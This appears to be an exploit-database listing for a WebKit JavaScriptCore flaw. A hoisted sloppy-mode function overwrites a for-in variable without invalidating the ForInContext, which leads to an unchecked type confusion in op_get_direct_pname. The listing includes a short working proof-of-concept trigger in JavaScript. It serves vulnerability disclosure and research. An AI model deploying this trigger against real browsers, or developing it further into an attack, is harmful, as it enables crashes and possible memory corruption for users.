Webkit jsc bytecodegenerator::hoistsloppymodefunctionifnecessary does not invalidate the forincontext object Vulnerability / Exploit


Exploits / Vulnerability Discovered : 2018-11-29 | Type : dos | Platform : multiple


[+] Code ...

/*
This is similar to issue 1263. When hoisting a function onto the outer scope, if it overwrites the iteration variable for a for-in loop it should invalidate the corresponding ForInContext object, but it doesn't. As a result, an arbitrary object can be passed as the property variable to the op_get_direct_pname handler, which uses the property variable directly as a string object without any check.

PoC:
*/

function trigger() {
    let o = {a: 1};
    for (var k in o) {
        {
            k = 0x1234;

            // Sloppy-mode block-level function declaration: hoisted onto the
            // enclosing function scope, overwriting the for-in variable k.
            function k() {

            }
        }

        // The for-in fast path (op_get_direct_pname) still treats k as the
        // enumerated property name string.
        o[k];
    }
}

trigger();
